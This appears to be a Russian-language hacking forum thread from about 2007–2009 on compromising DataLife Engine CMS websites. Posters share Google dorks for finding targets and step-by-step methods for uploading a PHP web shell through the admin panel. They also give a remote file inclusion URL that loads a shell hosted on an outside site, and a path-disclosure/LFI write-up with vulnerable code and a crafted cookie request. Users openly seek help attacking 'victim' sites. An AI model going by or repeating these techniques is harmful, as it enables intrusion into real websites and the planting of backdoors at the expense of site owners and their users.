[ Обзор уязвимостей DataLife Engine ]

Discussion in 'Веб-уязвимости' started by Solide Snake, 28 Oct 2007.

  1. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    в нуленных DataLife Engine 8.2 это убрали)
    и вообще ни одного сайта уязвимого не нашел из 100
     
  2. Andrewko1

    Andrewko1 New Member

    Joined:
    13 Feb 2009
    Messages:
    17
    Likes Received:
    2
    Reputations:
    1
    запрос для гугла

    Подскажите как написать запрос для гугла чтобы найти сайты на движке dle
     
  3. FeraS

    FeraS Elder - Старейшина

    Joined:
    19 Jan 2007
    Messages:
    555
    Likes Received:
    420
    Reputations:
    76
    inurl:index.php?do=register
     
    2 people like this.
  4. Useroff

    Useroff Elder - Старейшина

    Joined:
    23 Aug 2008
    Messages:
    146
    Likes Received:
    27
    Reputations:
    -3
    dle_config_api - используют только нулледы, так что на лицензию это не распространяется.
     
  5. Dark_cracker

    Dark_cracker Member

    Joined:
    29 May 2009
    Messages:
    73
    Likes Received:
    8
    Reputations:
    1
    Не знаю важно или нет , ну мне часто помогало...Если админ не поставил на шаблон достаточно прав , то через админку когда изменяешь шаблон пишет ошибку :( , я это обхожу с помощью создания нового шаблона , после того как создали новый шаблон его можно редактировать ;-) , в настройках системы выбераете тот шаблон который создали:)
     
    2 people like this.
  6. redlain

    redlain New Member

    Joined:
    13 Nov 2006
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    вопрос как залить шелл через админку с возможностью его последующего запуска
    вопрос возник из-за того, что файл заливаемый через новости, фильтруется хц аксесом.
    А если в шаблон заливать, то скобки "<>" не обрабатываются (
    Других явных вариантов тут не нашел и пока самому не пришли в голову... кто что знает?
     
  7. phpdreamer

    phpdreamer Member

    Joined:
    26 Jul 2009
    Messages:
    522
    Likes Received:
    86
    Reputations:
    19
    Заходишь в "настройка системы" => "настройка загрузки файлов на сервер" => "Расширение файлов, допустимых к загрузке" дописываешь PHP. Потом "Добавить новость" там не чё не заполняем и новость не добавляем... просто "загрузка файлов на сервер" загружаешь значит свой шелл... он сохраняется в ...\uploads\files\десять цифр_название.php а потом пробиваешь на валидность...

    и еще
    https://damagelab.org/index.php?showtopic=16780&pid=103742&st=10&#entry103742
     
    #67 phpdreamer, 19 Sep 2009
    Last edited: 19 Sep 2009
  8. Dark_cracker

    Dark_cracker Member

    Joined:
    29 May 2009
    Messages:
    73
    Likes Received:
    8
    Reputations:
    1
    уже обсуждалось , много раз <FilesMatch "\.(avi|mp3|mp4|flv|swf|wmv)$|^$"> , так что , то что ты написал полная чушь:)
    C этого поржал :)
    этот тип тоже какую то ху**ню написал.
     
  9. hackmon

    hackmon Member

    Joined:
    16 Sep 2009
    Messages:
    58
    Likes Received:
    40
    Reputations:
    2
    можно ли через пользователя залить шелл?
    имеется доступ /admin.php?mod=addnews&action=addnews
     
  10. SpYeR

    SpYeR New Member

    Joined:
    11 Nov 2007
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    hackmon, нельзя.
    В последних версиях, по-моему, вообще нереально, имея даже полный доступ в админку.
     
  11. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Если имеется установленный модуль DLE forum - то шелл залить проще простого, имея доступ в админку.

    Заходим в админку - другие разделы - настройка модуля DLE forum (/admin.php?mod=options&action=options)
    Настройка (/admin.php?mod=forum&action=tools) - таб "настройка загрузки файлов на сервер".
    В "Расширение файлов, допустимых к загрузке" дописываем ",php", сохраняем.
    Идем на форум, выбираем любую тему, нажимаем "ответить", в нвоом окне нажимает на значок папки (выше поля ввода сообщения).
    Там выбираем наш шелл в .PHP формате (.php обрезается самим движком). Грузим, вставляем в пост (аттачмент), постим. Видим в посте линк. переходим - вот и наш шелл.
    после этого можно залить наш шелл в другое место, удалить этот и стереть пост.
    Ну и, главное, не забыть в админке в настройках убрать добавленное разрешени PHP
    (с)WildShaman 2009
     
    2 people like this.
  12. SpYeR

    SpYeR New Member

    Joined:
    11 Nov 2007
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    wildshaman,
    только что попробовал, не получилось. Скорее всего из-за ЧПУ. По-моему, оно должно быть отключено.
     
  13. SpYeR

    SpYeR New Member

    Joined:
    11 Nov 2007
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    Если есть доступ в админку, то сделать бэкап базы, скачать его, и вытащить оттуда.
     
  14. hackmon

    hackmon Member

    Joined:
    16 Sep 2009
    Messages:
    58
    Likes Received:
    40
    Reputations:
    2
    у мня проблема вот линк http://www.milw0rm.com/exploits/9572
    там эксплоит www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?]

    вместо сайт я вставляю сайт жертвы (и знаю что там установлена такая же версия)


    эта строчко остается неизменная /engine/api/api.class.php?dle_config_api=

    и шелл Я загрузил на site narod.ru тоесть после config_api= я ввожу линк на свой сайт с шеллом

    пс убирал расширение ничего

    кто потскажет
     
  15. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    http://site-na-dle.ru/engine/api/api.class.php?dle_config_api=http://site.narod.ru/.txt?
    так делал? с вопросом в конце.
     
  16. hackmon

    hackmon Member

    Joined:
    16 Sep 2009
    Messages:
    58
    Likes Received:
    40
    Reputations:
    2
    все равно
     
  17. (Dm)

    (Dm) Elder - Старейшина

    Joined:
    8 Apr 2008
    Messages:
    261
    Likes Received:
    440
    Reputations:
    275
    Может register_globals = Off
     
  18. hackmon

    hackmon Member

    Joined:
    16 Sep 2009
    Messages:
    58
    Likes Received:
    40
    Reputations:
    2
    я на разных сайтах смотрел
    wildshaman предположил что Эта бага есть только у версий,с качанных с сайта http://dlecms.com

    как по другому моно замутить
     
  19. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Раскрытие путей + LFI
    DataLife Engine <= 8.2

    Тип: Раскрытие путей
    Автор: mailbrush
    Версия: DataLife Engine <= 8.2
    Описание: Уязвимость заключается в отсутствии фильтрации входного параметра "dle_skin" в файле init.php и позволяет удалённому пользователю добиться вывода ошибки функции, соответственно увидев пути к корню сайта.
    Уязвимый код:
    /engine/init.php
    PHP:
    ...
     } elseif (isset(
    $_COOKIE['dle_skin']) AND $_COOKIE['dle_skin'] != '') {

        if (@
    is_dir(ROOT_DIR.'/templates/'.$_COOKIE['dle_skin']))
            {
                
    $config['skin'] = $_COOKIE['dle_skin'];
            }
     }
    ...
    $tpl->dir ROOT_DIR.'/templates/'.$config['skin'];
    ...
    include_once 
    $tpl->dir.'/login.tpl';
    Эксплуатация:

    • Заходим на сайт DLE. Открываем браузером менеджер куки. Изменяем / добавляем параметр, название которого ставим
      Code:
      dle_skin
      и значение
      Code:
      ../
    • Отправляем запрос на сайт:
      Code:
      GET / HTTP/1.1
      Host: dle-news.ru
      Cookie: dle_skin=../
      Cookie2: $Version=1
      Connection: Close
    • Самый простой вариант - используем мой скрипт:
      Code:
      http://mailbrush.eu/tools/dle.php
    После этого на сайте видим ошибку:
    [PATH] - это и есть раскрытие путей.

    Соображающие люди поймут как сделать из этого LFI.

    Дорк:
    Code:
    Powered by DataLife Engine
     
    #79 mailbrush, 17 Oct 2009
    Last edited: 8 Feb 2010
    13 people like this.
  20. SpYeR

    SpYeR New Member

    Joined:
    11 Nov 2007
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    mailbrush
    Круто.
    Ухты! Можно даже залить шелл если в uploads/files залить свой login.tpl
    указывать dle_skin=../uploads/files/